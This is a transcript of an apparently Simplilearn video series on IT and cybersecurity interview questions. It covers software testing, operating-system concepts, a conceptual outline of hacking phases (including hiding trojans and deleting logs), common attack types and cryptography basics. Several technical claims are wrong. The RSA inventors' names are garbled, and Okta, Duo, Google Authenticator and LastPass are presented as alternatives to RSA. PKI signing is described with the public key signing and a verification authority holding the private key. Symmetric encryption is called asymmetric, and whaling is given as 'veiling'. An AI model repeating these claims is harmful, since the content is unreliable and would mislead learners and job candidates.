acceptance testing, you're verifying that that scope has been met and the client requirements have been met, and you can assure the client about the functionality and the performance of that particular application. Coming to the last question in this software programs, what are the valuable steps to resolve issues while testing? So in the previous scenarios when we have started testing, now if you find out, when you execute a particular use case and then you find out a flaw, what would be the steps that you would utilize to address those particular flaws in those tests? The first step will always be record, then you're going to report it, and then you're going to introduce a control process for it. So when you say record, you're going to create logs and you're going to try to resolve all the problems that have happened. Now, when you say resolve, you're not going to recode the application, but you're going to test the system again and again to ensure that whatever is being recorded is accurate, and all the logs, all the error mechanisms, all the dumps, all of those that have been generated due to this particular log or due to this particular error are being captured so that they can be reported to the higher level managers. So the next step is, once you have accumulated all these logs and records, you're going to report them to the higher level managers, who are then going to investigate it and go back to the developers trying to figure out the best way to mitigate those particular flaws. So the report writing needs also needs to be accurate. It needs to be to the point. It needs to detail what the problem was. It will document all the steps that you took, all the inputs that you put in, and it will also record all the errors, and it will also record all the mechanisms that were utilized and the errors that were generated. And that report will be given to the higher level managers, who can then forward it to the developers, who based on those reports can start their troubleshooting. And then the control mechanism comes in. You're going to define the issue management process. So this process needs to work in a particular manner, where you're doing a test, you're recording whatever is happening, you're creating a report out of it, you're sending it to the management. The management will then take those reports, study them, take it to the developers. The developers will test based on their criteria. They might interact with the testers at that point in time to identify particular flaws, and then they might want to recode that application or develop a patch which, once installed, will mitigate that particular flaw, and then it can come back to the testing phase again, where you can repeat those tests and validate that the flaw is no longer existent. So these are the 3 steps that would be utilized for testing purposes. And that brings us to the first 10 questions on the software platform. In the next video, we'll be looking at operating systems and applications. The first question is on virtual memory. What exactly is virtual memory? For a computer, we have 2 types of memory. First is the primary memory, which is your random access memory, which is also known as a volatile memory. And the secondary memory is your hard disk, where your data is stored permanently. But for a computer, when it has, let's say, a 4 GB memory or a RAM, as in this scenario on your screen, it is going to replicate that and is going to create another 4 GB of virtual memory on the hard disk. And it is going to use it in tandem along with the RAM. So if the RAM is insufficient, the processor is going to utilize the 4 GB of the virtual memory that is created on the hard disk, and it is going to swap data from the RAM to the hard disk. This can also be known as a page file or a swap file. The next question is, what are different scheduling algorithms? Now, the context for this question is, you're talking about a processor, and you're talking about how processes are going to be fed to the processor and how the processor is going to treat these processes. So the first is first come, first serve. So the process which requests the CPU first gets the CPU allocation first. Now, whenever there are processes that are being run by different applications, they make requests for some CPU time. Now, in first come, first serve, the first service or the first process that is going to request some processing time will get that much allocated to them. They will run through the process first, and then the next, and the next, and so on and so forth. The second one is the shortest job first. This is the process where the shortest execution time for that process is calculated, and that process is selected first for the CPU. Then there is priority scheduling. This scheduler selects the tasks to work as per priority. So there would be some tasks that are marked with high priority, some would be normal, and some would be low. So based on this high, normal, or low priority, all the processes will be classified. High priority will be dealt with first, then the normal, and then the least priority. The fourth option is multiple level queues, where processes are assigned to a queue based on the specific property like process priority, the size of memory, etc. So it will be classified based on the attributes given to that particular process, and multiple queues will be created, and then based on the attributes, the processes will be processed by the CPU. Then shortest remaining time. The process will be allocated to the task which is closest to its completion. So you look at it this way, the process that will take the least time to complete its processing would be chosen first. And then the round robin method, where each process comes in turn, gets an equal share of time. So if there are 10 processes, each process will be allocated a certain amount of time, after which the next process will be processed, and so on and so forth. And it will continue in a round robin fashion till all the processes get executed. So in short, 6 different scheduling algorithms depending on how the operating system deals with it. The next question is, what are the steps involved in hacking a server or a network? So this is more of an ethical hacking question. You're looking at devices, and the interviewer asks you what kind of steps are involved. What are the activities that you would do in hacking a server or a network? Now, there are no specific steps that you would define because every hack is going to be unique. But it has a hack can be classified in 5 different steps, which are quite generic, right? So the first step will always be the reconnaissance step, also known as information gathering phase, also known as footprinting or fingerprinting, depending on what exactly you're doing. But in this phase, the attacker gathers all the evidence, all the information that is possible about the targets that they want to attack. So here you're trying to get to know the victim so you can launch specific attacks towards them. You want to identify what operating system they are utilizing, what IP addresses, MAC addresses, the versions of the operating systems and applications, the patch levels, find out vulnerabilities, find out whatever information is possible, find out the information about the person who's using those computers so you can launch social engineering attacks and so on and so forth. So the first step is all about gathering enough information based on which you can launch further attacks. Once you have that information comes the second phase, which is known as the scanning phase. This is more of a technical phase. So you have in the first step, you've got your IP addresses, domain names, maybe even network maps, and you have identified which devices are available. Now, in the scanning phase, you're going to identify live devices, and then you're going to scan them for open ports, processes, protocols, services. You're going to identify vulnerabilities. You're going to enumerate them to identify more information from them. Thus, at this point in time, you will have identified a certain set of vulnerabilities or a certain set of security loopholes that you can misuse. Once you have identified those, you're going to the next step, which is the gaining access step. In this, you're actually going to execute your attacks based on the vulnerabilities that you have found, and you're either going to gain access to that particular system by installing a Trojan, or destroy the system by installing a virus, or install a spyware or a keylogger, whatever you wanted to achieve. So in the gaining access phase, you would have, based on the knowledge that you have gained in the first and the second phase, you're going to launch your attacks and you're going to try to gain access to that particular device. Then the next step is where you're going to maintain that access. Now that you have hacked into that device, it is not necessary that you will always be able to get access to that device. Suppose you have cracked the password of that particular user and the user changes that password after a few days. Your attack is worthless. So what you're going to do here is you're going to maintain your access. So this is where it is assumed that you want repeated access to that device, and thus you're going to install a keylogger or a Trojan or some mechanism which will still allow you to get access to that device without the knowledge or the authorization of that particular user. And finally, the last step is where you're going to cover your tracks. So whatever activity that you have done so far will have created logs and will have created information based on which the victim will come to know that they have been compromised and may be able to trace that activity back to you. So to prevent the user or the victim from realizing that they have been hacked, and to prevent them to discover who has hacked them, you want to cover your tracks by deleting logs and any references that point to that particular activity. You're going to hide the files that you have created. So you have installed a Trojan or a keylogger. These will create files and directories. You're going to hide them so that they are not discovered. You're going to hide processes that have been created. You're going to try to hide all the activity that you have done so that to conceal the actual attack and preventing the user from realizing that they have been compromised. So these are the 5 steps that will be involved in hacking a server, network, application, or any computing device you'll come across. The next question refers to what are the various sniffing tools. Now this is a network-based attack where you're trying to capture data packets that are being transmitted over the network, and then you're going to analyze them to see if you can capture any sensitive information like usernames, passwords, bank details, or anything of that sort. Now, These tools would also depend on which operating system you're utilizing. For example, MSN Sniffer would work on Microsoft operating systems. EtherCap would be based on Linux, and so on and so forth. So on the screen, you'll see 6 different sniffing tools that work on different operating systems. Wireshark is something that is common both on Windows and Linux. It is used to analyze network in detail. It is the de facto tool that you will come across in most of your ethical hacking trainings, in most of your organizations when they want to do data captures. Now, data capturing or packet capturing is not only done by hackers to gather more information, but it is also a known troubleshooting technique used by administrators and network administrators to analyze any issues that may be going on in the network, right? So the first tool you see on the screen is Wireshark. Like we stated, is available for Windows, Linux as well. Then there is TCP dump, which again has the same capability of Wireshark, but is a command line version, whereas Wireshark also has a GUI, a graphical user interface. TCP dump is available on Linux. MSN Sniffer, it's a very old tool. When we had MSN Messengers, MSN Messenger is no longer there, but Microsoft does or did have a Microsoft Message Analyzer tool, which they have stopped development since 2015. But that's another tool that is specific for Microsoft operating systems from Microsoft that can be installed to gather more information. Then you've got EtherCap, which is a tool to launch man-in-the-middle attacks, data capturing, and is essentially a Linux command line based tool. Then DSniff is another password and network capturing tool which can help you capture data packets, prominently a Linux tool. Same with Iterate. This is a graphical tool which will allow you to capture data traffics and map protocols and identify which IP addresses have been communicating with what. Essentially, all of the tools have similar functionality, except that some have additional functionality like launching man-in-the-middle attacks or capturing or having specific filters that will help you identify and troubleshoot some network issues that you may be facing. Moving on to the next question, what is an operating system? Now, this is a very difficult question to answer because we normally, when we want to answer this question, we start off with the functionality of an operating system, right? We try to describe what Windows does or what Linux does or what Mac OS does, and then we are trying to figure out what an operating system is in the first place. But an operating system essentially, as the slide says, is a software program that provides a platform for computer hardware to communicate and operate with the computer software. So it is basically an enabler for human interaction with the hardware that you have. If you take the operating system out of the question, it's just some hardware which cannot interact with you. But essentially, when you have an operating system like Microsoft Windows or Linux or Mac, you're essentially installing an instruction set on that particular device, which will allow you to interact and manipulate the hardware to do whatever you want that hardware to do, right? Essentially, when we talk about drivers for your various devices, like a driver for your LAN card or for your sound card or for your graphics card, which allows you to tweak these cards for functionality, right? It allows us input and output functions. For example, the basic example, you open up Microsoft Office products like Microsoft Word or Excel, and you get a GUI on the screen, which you can interact with. You got a keyboard and you type on that keyboard, and the computer knows what you're typing and reflects those actions on the screen by showcasing it on that particular Excel file or a Word file. So how does the computer know what to do or what you're exactly intending to do at this point in time? It is all the operating system that is providing you all these services, analyzing what your inputs are, and then based on the programming, it is going to execute that and show it to you on the screen, right? Some of the most commonly used operating system are Microsoft Windows. You have them in desktop as well as server variants. Unix, Linux, again Linux as desktop and servers. You got Ubuntu in Linux, Red Hat, and so on and so forth. And then you got Mac OS for Apple related components. The next question, what is the difference between microkernel and macrokernel? Now, the first thing we need to know is what is a kernel. Kernel is the heart of the operating system that allows that input and output to happen. It allows those drivers to be set up so that the hardware can interact with the software, and we can then instruct the software and the hardware both to function in a particular manner. So there are two types of kernels, microkernels and a macrokernel. Macrokernel is something that we normally use. Microkernels are for operating systems that use processes directly handled by the processor. The microkernel is very small in size. Macrokernel is large because it basically is the entire image of the operating system. The execution for a microkernel is slow. The macrokernel is going to be faster because it is more evolved. There's a lot of programming involved. Extendability. Microkernels are easy to extend. Macrokernels are hard to extend. As far as security is concerned, if a macrokernel crashes, it takes everything down with it. The entire operating system is going to crash. But in case of a microkernel, it is only that particular process that is going to get affected. Microkernel, there is a lot of coding involved. Macrokernel, less coding is involved. Examples of microkernels would be Symbian OSs, most popularly used on yesteryear phones, Nokia's if you remember those, QNX and so on and so forth. Macrokernels, your Linux or BSD operating systems essentially use macrokernels. Next question, what are the different types of operating systems? So as you can see on the screen, 5 types of operating systems: batched OS, distributed operating systems, time sharing, multi-program, and real-time. What are batched operating systems? The computer operator places the jobs coming from input devices into batches. So consider this not from a desktop perspective, but from a server perspective, where these devices are used by organizations to compute and to crunch some processes that is going to make some business sense out of it. So when there are multiple processes coming in, multiple jobs that are going to be scheduled, a batched OS is going to place these jobs in batches, and they're going to crunch those based on the inputs that have been given by these operators. Distributed OSs, where there are multiple computers which are interconnected and are communicating through networks. So in a corporate environment, you don't use one single computer to do everything. You got a data center, and the data center will have a cluster of servers where they're going to share some resources to crunch one particular task, right? So that's where your distributed OSs come into the picture. Then you have time sharing OSs, where you are renting some time. So time sharing OSs minimizes the response time. Example, in today's world, cloud, right? You go onto the cloud, you have a virtual service over there, you schedule something, you schedule a job over there, it is executed, and for that time being, that operating system services your particular request and provides you that particular job. Any application that you see online that is executed, for example, Facebook, from a consumer's perspective, could be a time-shared experience. Then, multi-programmed OS, the operating system uses CPU scheduling to separate jobs. So you're scheduling the CPU to complete certain jobs in this particular manner. And in real-time OS, the operating system gives maximum time to critical operations. So it identifies the priority of these operations. It knows the high priority items, the medium, low priority items, and based on that, it is going to execute these critical operations and get the job done. Moving on to the next question, what is the difference between logical address space and physical address space? Now, when you're looking at address spaces, this is where applications come into the picture, and when you execute an application, it is going to create a particular address in the memory where it is going to create a buffer to store its own information so that it can be provided to the processor, processed, and then can be returned back to the application as an output, right? So as far as definitions are concerned, a logical address is generated during running of an application or a program. A physical address is a physical address or a physical location on the memory module itself, right? Visibility, you can view a logical address because it is programmed into a computer. So if I'm looking at C++ and I'm using malloc or memory allocation, that's where the logical address is going to be created, where a buffer is going to be created for that program, and whatever the user input is going to be, it's going to be stored in that buffer. But whereas physical address is concerned, this logical address will be created on a physical store or a physical memory module, which will have its own addressing mechanism. Thus, you can see the memory module, but you cannot see the specific address on that particular memory module. But as far as a a logical address is concerned, while you're programming or you're debugging the application, it will show you the logical address that has been created, the start point and the end point of the logical address that has been created for that particular program. It can be shown in a debugging environment, right? Address space, logical, and physical address is physical, like I discussed, it's the memory module itself. You can access only the physical address on that particular memory, because logical addresses can be viewed, but you cannot access them physically. Generation, the logical addresses are generated by the CPU during the processing time, whereas physical addresses are computed by the memory management unit, or the MMU, that you have on your computers. And as far as logical addresses, they will always be they are variable, whereas the physical address is always going to be constant. Looking at the next question, what is the difference between logical address space and physical address space? So moving on from the previous question to this, the logical address is an address created by the CPU for the processes that need to be addressed and that need to be stored as a buffer in the physical memory, whereas the physical memory itself is going to be an address that is going to be there on the physical part of that memory, which is going to be assigned to it by the MMU. Then the next question discusses shells. So what shells are used in Linux? Now, what is a shell? Shell is the command line interface that we utilize on a Linux machine. So the terminal window, as we call it, is a shell. And there are different variations of a shell based on what Linux operating systems you're using. The desktop operating systems that you use or the server operating systems in today's world that you're going to use normally will always have a bash shell, which is the first shell that you see on the screen. Known as a born again shell, it is a default for Linux distribution. So as far as end consumers, regular consumers are concerned, it is always going to be a bash shell, a born again shell that you're going to utilize for scripting and to execute regular commands. But when it comes to high level programming, or it comes to specialization tasks, then you got the rest of these shells that you can utilize. For example, the KSH, known as a Conn shell, is used for high level programming, which supports associative arrays and built-in operations. The CSH or the C shell has different functionality like spelling corrections and job controls. The ZSH or the Z shell provides unique features like file generation, startup files, and Fish, friendly interactive shell, which provides features like auto suggestions and configuration. So all of these have different functionalities depending on what usage that you have for that particular shell. The most common shell, like I stated, is the bash shell that you'll always come across in your desktop Linux operating systems. Then looking at the next question, what are the process states in Linux? Now, what is a process? Process is basically a service that is running for a particular application, for that application to function, right? This process is going to direct user input to the processor, process it, get that output back to the application, execute it, and then show it onto the graphical user interface for the user. So in Linux, there are 5 states for a process. First is the ready phase. Now in ready, in this state, the process is created and it is ready to run. So it is waiting for input. It's ready. The application is executed. The running is when the process is being executed itself. Blocked or wait is when user input is being looked upon. So it's waiting for user input so that it can do the processing. Completed or terminated, it has completed its execution or was terminated by the operating system for some reason or the other. So this is when things have, the processing has been completed. And then last state is zombie, where the process is terminated, but the process table still holds the information. Maybe it is waiting for the kill request before it gets terminated. So these are the 5 states for a Linux process to be in. And that brings us to the 10 questions in the operating system and application space. In the next video, we'll be looking at 10 more questions on cyber attacks. Interview questions based on cyber attacks. Let's start off with the first one. The first question is, what is SQL injection? SQL stands for Structured Query Language, which is a language that is used by most of your databases or your relational databases. The variations of your database would be MySQL, Microsoft SQL, Oracle SQL. You'll have IBM databases. All of these databases utilize the structured query languages to interact with the applications. Now, all of these databases have their own syntax, so you'll have to study
most of these databases based on which applications and which databases you want to provide security for. But as the name suggests, SQL injection vulnerability or a structured query language injection vulnerability is where a user can maliciously inject a SQL input or a SQL statement in a query and send it to the database and evoke a response out of it. So this vulnerability is not specifically to the database. The vulnerability lies more in the application and the coding of that application. So when the application receives a query which it needs to be forwarded to the SQL database, we need to configure at the application level of what queries are allowed and what queries are not allowed. So there are different various aspects of how to manage a SQL injection vulnerability. But the basic flaw lies in the application where invalidated input is accepted and sent forward to the database, where the database might confuse it into an executable statement and thus create a response that was not warranted. There are various types of SQL injections as shown on the screen. In-band SQL injection, where you can look at an error-based or a union-based injection. A blind SQL injection, where it is either Boolean-based or a time-based attack. And then an out-of-bound SQL injection. Essentially, you're looking at databases and you're looking at application security, where you want to encourage secure coding practices so unvalidated input is mitigated. The next question is, what is spoofing? Now in spoofing, you're basically assuming the identity of another person. So here the attacker pretends to be some other person or an organization and sends you an email that appears to be a legitimate email. It looks almost genuine. It has been constructed to replicate what a genuine email would have been, and it is very difficult to spot a fake one. There are different ways to identify whether an email is genuine or not, but that's for a different video. Moving on to the next question, what is a distributed denial of service attack or a DDoS attack? Now, generally a denial of service attack is an attack where legitimate users are prevented access to the resources that they legitimately can access, right? So, for example, if it is a bandwidth-based attack, the attacker consumes the bandwidth of the network in such a way that there is no more bandwidth left for legitimate users to access the network. Now, a single device may not be able to generate that much amount of traffic to consume the bandwidth of a huge server. Thus, the attacker will construct a botnet, and through that botnet, they will launch a distributed denial of service attack to the target victim. Right? So, a botnet, there are two terms that we want to look at over here. The first term is a bot, and the second one being the botnet itself. Bot is a software that once installed on a victim's machine allows the hacker to send remote commands to that machine that will make it generate some activity. Once we have enough machines on which such bots have been implemented, the collection of these machines would be known as a botnet. So an attacker would then instruct this entire botnet to start generating data traffic to be sent to the targeted network or to the targeted server, which will then bog down the server, thus crashing it and preventing users from accessing that particular resource. The next question is how to avoid ARP poisoning or ARP. Now, first let's understand what ARP is. ARP stands for Address Resolution Protocol, which is a protocol used by computers to communicate over the network. Once your computer boots up, it starts a discovery process of identifying its neighbors. So if I'm in a particular subnet, my machine will proactively send out ARP requests, an address resolution protocol, to find out which other machines are within the same network and which are live. Once it sends out a query, a live machine will respond to that query along with its MAC address. This information is then stored in what is known as an ARP table or an ARP table on the machine's cache. So whenever my machine now wants to send out a packet to this particular machine, it will go to the ARP table, it will identify the IP address and the associated MAC address, it will print that onto the data packet as a destination IP and destination MAC and send that packet across to the switch. The switch will then identify the MAC address and send the packet to the relevant machine that is connected to that particular switch. Now, to confuse the switch into sending it to a different machine, our poisoning attack is created. This attack is generally launched to create a man in the middle attack. Now, to prevent this ARP poisoning from happening in the first place, there are three different aspects that we can utilize. First, we can use packet filtering, which will filter out and block packets that have the same source address data. So you have identified some malicious IP addresses and you want to block out some IP addresses. So you're using a packet filter firewall where you have instructed the firewall to filter out certain packets originating from particular range of IP addresses. This firewall and this technique will then block those kind of packets coming in. Second, keeping away from trust relationships. Organizations will develop protocols that do not depend on trust relationships, and thus you want to keep this protocol away from there. Once you have created a trust relationship, these machines should not be sending out ARP requests to other machines in the first place. Since the trust relationship has been defined and these machines know whom to communicate with, such kind of protocols should then be disabled. Or you can use ARP spoofing software. So there are softwares out there that will look for ARP spoofing and prevent that from happening in the first place. So if somebody has sent out a spoofed ARP packet, that packet will be picked up by this software and it will be mitigated. Network visualizers like Glasswire, antiviruses like Sophos, they have inbuilt capabilities of identifying ARP spoofing attacks and mitigate them in the first place. In the next question, we are going to discuss what is ransomware. Now, ransomware is a type of malware that blocks victims to access personal files and demands ransom to regain access. There are three categories. Before we go into the categories, let's just revisit what ransomware is. Let's start with the word malware. Malware is a malicious software that poses as a legitimate software but has a payload that will have a security impact on your machine. So in this instance, viruses, trojans, all of these can be classified under malwares. So can ransomwares. A trojan is a software that will give you a backdoor access to a particular device. A virus will do some destructive activity on that device. A ransomware will basically encrypt the data of that particular user on that particular machine, thus rendering that data inaccessible to the users themselves, and in turn will demand a ransom to provide access to that particular data. So the three types of ransomwares, the first one is scareware, which uses social engineering to cause anxiety or the perception of a threat to manipulate users into buying unwanted software. So this preys on the gullibility of humans, where you can see a pop-up appearing on your screen which can scare you into believing that you may have been attacked or there is a virus on your machine, and then instructs you to download a particular software to mitigate that particular virus. Now, the malware will be in this software that you will be downloading, and then a ransomware will be installed and your data will be encrypted. Screen lockers, where locking users' computers by preventing them from logging in and displaying an official looking message. You will see a screensaver once you boot up, which prevents you from accessing the login page, so it will not allow you to log into your own machine, but it will give you a warning that your data has been encrypted and you need to connect to a particular email address and send bitcoins over there to get a decryption key to access your own data. And then the encrypting ransomware displays a message demanding payment in return for the private asymmetric key, which is needed to decrypt the symmetric keys for encrypted file. So once your files have been encrypted, you might just have a blank screen in front of you where you'll receive a warning message where it instructs you to pay up a ransom in bitcoins or in some cryptocurrency to some particular digital e-wallet which is not traceable. And once you make that payment, they will send you the decryption key and then you can access your data.
If getting your learning started is half the battle, what if you could do that for free? Visit SkillUp by Simplilearn. Click on the link in the description to know more.
Then talking about the next question, what is the difference between an active and a passive cyber attack? Now, when we talk about cyber attack is an activity that is caused by a malicious user who wants to try to get access or do some security incidents on the victim's devices. So there are two ways that can happen. It's either in an active manner or a passive manner. In an active manner, the intruder attempts to disrupt a network's normalcy, modifies data, and tries to alter the system's resources. So this is more active, where the attacker will proactively try to destroy the network so that communications fail, or they might try to modify the data where we're using a ransomware they can encrypt it, or they might delete that data using a virus, or steal that data using a Trojan, or they might even alter the data so that it is no longer trustworthy. Whereas in a passive attack, the intruder intercepts data traveling through a network. Here, the intruder eavesdrops but does not modify the message. So they're just listening in, they're just observing what is going on. They're not manipulating the data, they're not stealing anything. It's just that they are monitoring the activity that's going on. Then the next question, what is a social engineering attack? Now, social engineering attack is a people-based attack. The victim here is the human by itself. The vulnerability also lies in the human. It may be executed through a computer, but end of the day, the gullibility is of the human. So it is the art of manipulating people so that they end up giving up confidential information. Now, we always read in the papers where somebody got manipulated, their passwords got hacked, and somebody's life savings got wiped out, right? Because they shared the OTP with someone, or they shared the password with someone. Now, creating a scenario where these people will fall prey to this attack and share this kind of personal information to unknown people, that is where the social engineering attack comes in. Creating that scenario which will ensure that these people give out this confidential information. Now, there are three categories in this attack. The first one is a phishing attack, second is a spear phishing attack, and a third is a veiling attack. Now, phishing attack is basically a generic attack. It is targeted to the world at large. Whoever falls prey to that attack will be a victim. Whereas a spear phishing attack is a targeted attack towards a specific individual or a group of individuals or towards an organization. So there is a lot more research that goes into spear phishing, where you analyze the victim, you try to figure out what their vulnerabilities are, and you tailor make or you customize the attack to that particular vulnerability. Once you have that attack, you launch it against those people will then fall prey to this attack. And a veiling attack is where you're attacking top level executives. So the C-level executives of an organization, politicians, movie stars, wealthy and powerful people. So any of these people, when they're attacked, it will be known as a veiling attack. Next question, what is man-in-the-middle attack? Now, this is something that we had touched base when we talked about ARP, where the ARP poisoning attack needs to be executed to leverage a man-in-the-middle attack. Now, in the man-in-the-middle attack, the attacking computer takes the IP address of the client. Unaware of this, the server continues to communicate with the attacker. Now, if you remember in a previous question, we have also talked about spoofing. So in this scenario, attacker has spoofed their IP address to replicate themselves as a genuine client. And now with that spoofing in mind, they might either through a ARP poisoning attack or just because of the spoofed IP address become a man in the middle. That means that they are now eavesdropping on the conversation between the actual client and the server by posing themselves as a server. In this scenario, the attacker is now a go-between between the client and the server and can eavesdrop and can copy the data. If they want, they can modify the data as well. So as you can see on the screen, the attacker becomes man in the middle, which means that they are now eavesdropping on the conversation that is happening between the client and the server. The next question, who are black hat hackers and white hat hackers? The main thing is the differentiation between a black hat hacker and a white hat hacker. Now, a black hat hackers are skilled individuals who illegally hack into a system. The motive behind such an attack is mostly for monetary gain. These individuals are also known as security crackers. Now, if you look at your criminal hackers, those who have malicious intent, those who do hacking for the intent of personal gain or for the matter of disruption. The main thing that black hat hackers lack is authorization. They are not authorized to do the activity that they are about to do, and they are going to get unauthorized access to devices or to data, which is going to cause losses to the organization involved. Whereas on the other side, a white hat hacker are also known as ethical hackers. These are the individuals who discover vulnerabilities in a computer network and they help the organizations mitigate these vulnerabilities. They help the organizations defend themselves from black hat hackers. So the main difference between these two types of hackers, a black hat and a white hat, is the intent and the authorization. So black hat hackers will have malicious intent. They will try to personally gain from that attack by finding out vulnerabilities. They also will not have authorization to conduct whatever activity they are doing. Whereas on the other side, white hat hackers will be hired by organizations. They will provide authorization for certain activity that the white hat hacker can do to find out those vulnerabilities. Once those vulnerabilities have been found out by the white hat hacker, they will report it to the management and guide them in implementing security controls to mitigate those vulnerabilities. The main difference between a black hat and a white hat is the authorization and the intent. The next question, what are honeypots? Now, honeypots are a very interesting device that can be introduced in a network. These basically are decoy servers that are implemented in a network to attract the attention of an attacker. It is there to lure an attacker into attacking that particular device, thus creating a security blanket for the rest of the devices. So if an attacker has been able to bypass a firewall and is now trying to scan a particular network, when they scan, they will come across various devices that are there in the network. They will then proceed to do a vulnerability scan on these devices. The honeypot at that point in time will provide as prove as an attraction to these attackers, because it will demonstrate some vulnerabilities to the hacker which will divert their attention. So these vulnerabilities are simulated on these devices. These actually do not exist. But the moment the attacker then starts interacting with the honeypot will identify that as a malicious traffic and will warn the administrator about a possible attack that is going on. The administrator will then investigate through the honeypot of what activity is going on and then reconfigure their security controls to block the attacker or mitigate the attack itself. Right? So it is more of a decoy server that will showcase or simulate some vulnerabilities to an attacker, thus to lure them and safeguard the rest of the network. These are the 10 questions for cybersecurity. In the next video, we'll be talking about cryptography.
The first question, define cryptography, encryption and decryption. Now, cryptography is used by security professionals to scramble data into non-readable format, which is used in securing that information. So it involves converting data from a readable format into a non-readable format and then reversing it back to readable format again. For example, the word computer is now scrambled into looking like an unreadable format. Now, if you look at this word that it has been scrambled into, it would be very difficult for a human to figure out what the actual word was. Now, in this scenario, we have taken an algorithm where we have made a shift of the alphabet, where we have added 2 alphabets to the current one. So C plus 2 becomes E, O plus 2 becomes Q, M plus 2 becomes O. So we have done a shift of 2, and thus the key over here for this algorithm is the alphabet plus 2. So any person who figures that out will be able to unscramble this and convert this back into readable text. The fact of scrambling a readable text data into something that is unreadable by using a particular key is what cryptography is all about. Now, as we discussed, the decryption again is replacing the alphabet and taking it further back by 2 characters. So E minus 2 becomes C, Q minus 2 becomes O, O minus 2 becomes M, and so on and so forth. So anybody who knows this key, the shift key, anybody will able to decrypt this particular character. So this depends on the user. If I want to utilize alphabet plus 5, then the spacing, the shifting of that character will be the 5th character from that particular character, and so on and so forth. The next question, what is the difference between ciphertext and clear text? Ciphertext refers to the text which is encrypted and totally undecipherable. The message received after decryption is known as clear text. This text is comprehensible. So the word computer is clear text. That means that it has not been treated to any cryptographic measures. It is what it is intended to be. However, if the moment we encrypt it, that means we scramble it into unreadable text by using any of the algorithms that we'll be looking at,
that text is known as a ciphertext, and without the key, this becomes unreadable. The clear text, as discussed, is the plain word that we have utilized. We are using the English language in this instance, so the plain word computer is the clear text. Once we add the encryption layer to it, we get the ciphertext to it. Moving on to the next question, what is a block cipher? This refers to the method of encrypting the plain message block by block. The plain message is broken down into fixed size blocks and then encrypted. Now, a block cipher is normally used for data that is stored. So a data that is stored on a hard disk and we want to encrypt that data, that is known as block encryption or a block cipher. So a block cipher is an algorithm that will allow you to encrypt data that is stored onto a hard disk. So in this example, we've got plain text, which is 64 bits in size, and we have added a layer of encryption to it. So plain text plus the key that we have studied in the previous questions, and then the scrambled data out of it, which is unreadable and thus encrypted. Then the next question, what is public key infrastructure? Now, the public key infrastructure is a set of policies which secures the communication between a server and a client. It uses two cryptographic keys, public and private. So the infrastructure itself is a set of policies, people, procedures, and techniques which are standardized in nature and are globally accepted, which allow us to use digital certificates to encrypt data and decrypt the data at the other end. We use asymmetric encryption over here, which means that we use two keys. One is a public key to encrypt and the private key to decrypt. The other part of encryption is asymmetric encryption, where the same key is used to encrypt and the same key is used to decrypt. Now, in a public key infrastructure, like I said, we have standardized that. So in the standardization part of it, these are the various players that have been defined in the public key infrastructure. The first is the user or the sender in this scenario, the one who requires this digital signature to digitally sign a particular transaction or a communication. A registration authority with whom they are going to register for that particular key, the certification authority who issues that key, the verification authority who validates the key itself, and the recipient who is going to be the other party of that particular transaction. So how is this utilized? A sender or the user who requires this digital signature will request or apply for a digital signature with the registration authority. The registration authority would validate the genuinity of the user. So they might do some identity verification or proof of residence or something like that. Once they've identified the person and they have validated the information, they will then send the request to the certification authority stating that the sender has been validated, and the certification authority can issue the digital certificate to the particular user. They will send the public key to the sender, which will be utilized by the sender for further transactions. So when the sender is going to sign some data and wants to send it across to the recipient, they will use the public key to sign it and send it across. The recipient will then validate with the verification authority to see if the signed data is correct or not. Now, while the certification authority sends the public key to the sender, the certification authority updates the private key with the verification authority. So whatever is signed by the sender, received by the recipient, and they want to validate it, they will send it back to the verification authority. The verification authority will validate using the private key. Once the private key is validated, it will then send the OK signal back to the recipient, thus allowing the validation of that particular transaction. If the signature is tampered with or is not, the verification authority is not able to validate the signature, it will then send a denial message back to the recipient and the transaction will not go through. So the PKI enables trusted digital identities for people. So the PKI grants secure access to digital resources based on the infrastructure that has been created, and the core of the PKI is a certification authority which ensures that the trustworthiness of the digital data is ensured. So going back to the previous slide, these are the key players that have been standardized in the public key infrastructure. The certification authority is the authority that issues the digital certificates. The validation authority is the one who validates that digital certificate. Moving on, what is RSA? RSA is one of the first public key crypto systems that is used for secure data transmission. It stands for Revesh, Shamir and Edelman. Now these are the three people who have created this algorithm: Ron Rivest, Adi Shamir and Leonard Edelman, who are the inventors of this technique. It is an asymmetric cryptography algorithm which works on both public and private keys. Hence the encryption key is public and the decryption key is kept private. Now, as we have discussed earlier, symmetric and asymmetric cryptography. Symmetric cryptography is where the same key is used to encrypt and decrypt, whereas asymmetric cryptography is where there are two keys to encrypt and decrypt the algorithm. What are the few alternatives to RSA? Now, RSA is an algorithm that is used for encryption. There are a lot of other algorithms that can be utilized to alter or to scramble data depending on your requirements. So in the previous question we have studied and we have talked about what RSA is. It stands for Revesh, Shamir and Edelman, the three creators of that particular algorithm. But there are a lot of alternatives to this algorithm depending on how secure you want that data to be. And some of them are listed here on your screen: Duo Security, Okta, Google Authenticator and LastPass. LastPass is a password manager. So is Duo Security. Google Authenticator is something that we all utilize. It is an application that we can download and store on our mobile devices, and we can set that up to authenticate ourselves with certain portals. So it issues a unique ID to us, which once utilized will allow us access to those particular portals. Okta is an identity manager where you have created different digital identities and you have assigned them certain permissions, and based on your authentication mechanisms, Okta will allow or disallow access to those different applications or different portals as you have configured it. So all four are authorization and authentication mechanisms which can be used as alternatives to RSA.
If getting your learning started is half the battle, what if you could do that for free? Visit SkillUp by Simplilearn. Click on the link in the description to know more.
Next question: what are the prime objectives of modern cryptography? And this is a very important question because we've so far looked at what cryptography is and what public key infrastructure is. But what is the achievement out of it? Why are we utilizing it? And what do we want to gain out of it? So the main and the prime objectives of modern cryptography are as follows, mentioned on your screen. The first one is confidentiality. The second one is non-repudiation. Third one is authenticity. And the fourth one is integrity. Now, if I go back to the first one, confidentiality, that is where I want to keep data confidential. That means it will only be visible to the authorized users, right? So here I have created a list of people who have deemed as authorized users and have created a digital identity to them and have given access controls to those people. Now that is how confidentiality is ensured. So when we want to keep data confidential, we create a list of users who we are going to allow access to certain resources, and we are going to define what access controls are to be utilized, what access are allowed, whether they've got administrative access or user level access, and only those authorized users are going to be able to access these resources. That is how we maintain confidentiality. The next one is non-repudiation. Non-repudiation is the prevention of denial of having been a part of a particular transaction. So in the public key infrastructure that we discussed, where a digital signature was utilized to sign a particular transaction and then sent to the recipient, the sender would not be able to deny of having originated that transaction because it was using their digital certificate. Thus, non-repudiation comes into the picture. One more example that we can have here is on our mobile phones when we use SMS, short messaging service, and we send a message to another person. The person, when they receive a message, the number is validated by the service operator, and thus the sender cannot deny having sent that message. The sender at the same time can 